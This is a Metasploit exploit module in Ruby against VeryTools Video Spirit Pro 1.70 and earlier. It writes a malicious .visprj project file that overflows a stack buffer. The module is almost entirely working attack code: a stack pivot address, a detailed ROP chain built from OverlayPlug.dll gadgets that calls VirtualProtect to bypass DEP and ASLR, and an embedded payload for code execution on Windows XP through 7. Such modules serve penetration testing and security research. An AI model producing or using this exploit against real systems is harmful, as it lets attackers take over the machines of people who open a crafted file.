## # $Id: videospirit_visprj.rb 12305 2011-04-11 23:32:41Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VeryTools Video Spirit Pro <= 1.70', 'Description' => %q{ This module exploits a stack buffer overflow in Video Spirit <= 1.70. When opening a malicious project file (.visprj), a stack buffer overflow occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. }, 'License' => MSF_LICENSE, 'Author' => [ 'Acidgen', #found the vulnerability 'corelanc0d3r', #rop exploit + msf module ], 'Version' => '$Revision: 12305 $', 'References' => [ [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-001' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 800, #0x320 bytes - avoid marking wrong page as RWX 'BadChars' => "\x00\x0a\x0b\x0c\x0d\x0e\x0f\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x26\x27\x2f\x3c\x3e", 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass', { 'OffSet' => 168, 'OffSetToRop' => 952, 'Ret' => 0x1006CC10, #overlayplug.dll stackpivot bad char friendly } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 11 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'VideoSpirit project name.', 'msf.visprj']), ], self.class) end def junk return rand_text_alphanumeric(4).unpack("L")[0].to_i end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") header = %Q| <version value="1" /> <track> <type value="0" /> <type value="4" /> <type value="2" /> <type value="1" /> <type value="7" /> </track> <track0 /> <track1 /> <track2 /> <track3 /> <track4 /> <clip /> <output typename="AVI" keepaspect="0" presetquality="0"> <type0 enable="1"> | footer = %Q| <valitem name="320*240(4:3)" value="320*240" /> <valitem name="30" value="30" /> <valitem name="16000k" value="16000k" /> </type0> <type1 enable="1"> <valitem name="mp3" value="libmp3lame" /> <valitem name="128k" value="128k" /> <valitem name="44100" value="44100" /> <valitem name="2 (Stereo)" value="2" /> </type1> <type2 enable="0" /> </output> | print_status("Preparing payload") pivot = [target.ret].pack('V') rop_gadgets = [ # one non-ASLR module is enough for generic ASLR & DEP bypass ! # pvefindaddr rop 'n roll # First, grab VirtualProtect ptr 0x10065292, # POP EAX # RETN [OverlayPlug.dll] 0x106F4244, # IAT entry + offsqet (bad char friendly) 0x10019762, # POP EBP # RETN [OverlayPlug.dll] 0xEFEFEFF0, # bye bye offset 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll] 0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll] junk, junk, junk, 0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll] 0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll] # set size 0x100A9274, # POP EAX # RETN [OverlayPlug.dll] 0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :) 0x10019762, # POP EBP # RETN [OverlayPlug.dll] 0xEFEFEFF0, # boo 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll] 0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll] 0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll] junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, # set NewProtect to 0x40 0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll] junk, junk, junk, junk, 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] junk, 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] junk, junk, 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] junk, junk, 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] junk, junk, 0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll] junk, # write pOldProtect to .data section 0x1001AB51, # POP ECX # RETN [OverlayPlug.dll] junk, 0x10117030, # RW # EDI : ROP NOP 0x10057090, # POP EDI # RETN [OverlayPlug.dll] 0x10057091, # ROP NOP # pReturn2Payload 0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll] 0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll] 0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll] 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1003C946, 0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll] 0x100A9274, # POP EAX # RETN [OverlayPlug.dll] 0x41414141, # go 0x10066F84, # PUSHAD # RETN [OverlayPlug.dll] ].pack("V*") buffer = "<valitem name=" buffer << '"' buffer << rand_text_alphanumeric((target['OffSet'])) buffer << rand_text_alphanumeric(4) #nseh buffer << pivot buffer << rand_text_alphanumeric((target['OffSetToRop'])) buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7 buffer << rop_gadgets buffer << make_nops(150) buffer << payload.encoded buffer << rand_text_alphanumeric(4000) buffer << '"' buffer << ' value="msmpeg4v2"' buffer << "/>" buffer << "\n" filecontent = header + buffer + footer print_status("Writing payload to file") file_create(filecontent) end end